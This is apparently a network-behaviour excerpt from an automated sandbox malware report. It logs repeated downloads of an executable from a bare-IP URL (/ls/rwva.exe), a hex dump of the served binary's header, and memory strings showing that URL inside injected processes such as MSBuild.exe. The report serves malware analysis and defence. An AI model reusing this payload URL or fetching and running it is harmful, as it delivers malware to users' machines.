                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 20 Feb 2025 20:48:23 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 20 Feb 2025 17:42:16 GMTETag: "583400-62e9665226d2c"Accept-Ranges: bytesContent-Length: 5780480Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f5 e2 b2 6b b1 83 dc 38 b1 83 dc 38 b1 83 dc 38 15 fd dd 39 b3 83 dc 38 15 fd d9 39 b0 83 dc 38 15 fd d8 39 b6 83 dc 38 fa fb dd 39 b4 83 dc 38 b1 83 dd 38 bb 83 dc 38 a7 fc d8 39 b0 83 dc 38 a7 fc de 39 b0 83 dc 38 52 69 63 68 b1 83 dc 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 35 36 b7 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 24 00 26 58 00 00 0c 00 00 00 00 00 00 20 32 58 00 00 10 00 00 00 40 58 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 58 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 42 58 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 58 00 80 00 00 00 08 41 58 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 40 58 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 58 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 24 58 00 00 10 00 00 00 26 58 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3a 04 00 00 00 40 58 00 00 06 00 00 00 2a 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 03 00 00 00 50 58 00 00 02 00 00 00 30 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 80 00 00 00 00 60 58 00 00 02 00 00 00 32 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global trafficHTTP traffic detected: GET /ls/rwva.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlx: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7dHost: 147.45.44.68Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ls/rwva.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlx: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7dHost: 147.45.44.68Connection: Keep-Alive
                  Source: Joe Sandbox ViewASN Name: SONIC-WirelessZA SONIC-WirelessZA
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_039CAC48 recv,recv,recv,22_2_039CAC48
                  Source: global trafficHTTP traffic detected: GET /ls/rwva.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlx: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7dHost: 147.45.44.68Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ls/rwva.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlx: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7dHost: 147.45.44.68Connection: Keep-Alive
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.4557432637.000000000393C000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                  Source: VirtualPR.exe, 00000000.00000002.2192138622.00000000036C4000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 0000000E.00000002.2378486056.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 0000000E.00000002.2378486056.00000000034F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.68
                  Source: VirtualPR.exe, 0000000E.00000002.2378486056.000000000346D000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 0000000E.00000002.2378486056.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000012.00000002.2321243517.0000000000A04000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000012.00000003.2319203943.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000012.00000003.2319119106.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000012.00000003.2319282606.0000000000A13000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000012.00000003.2319419609.0000000000A04000.00000004.00000020.00020000.00000000.sdmp, ouz2pkol.dll.18.dr, saruzovf.0.cs.0.dr, ouz2pkol.0.cs.14.dr, saruzovf.dll.5.drString found in binary or memory: http://147.45.44.68/ls/rwva.exe
                  Source: csc.exe, 00000005.00000003.2137425682.0000000000C31000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000012.00000003.2320382245.0000000000BF1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.68/ls/rwva.exe0
                  Source: VirtualPR.exe, 00000000.00000002.2192138622.000000000364D000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 0000000E.00000002.2378486056.000000000346D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.68/ls/rwva.exeP
                  Source: VirtualPR.exe, 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2192138622.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                  Source: VirtualPR.exe, 00000000.00000002.2192138622.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VirtualPR.exe, 0000000E.00000002.2378486056.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 00000016.00000002.2407142771.000000006E66F000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2403659625.0000000063469000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/V
                  Source: MSBuild.exe, 00000016.00000002.2403659625.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                  Source: MSBuild.exe, 00000016.00000002.2403659625.0000000063281000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50238
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50237
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50239
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50230
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50232
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50231
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50233
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50241
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50240
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50243
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50242
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50246
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
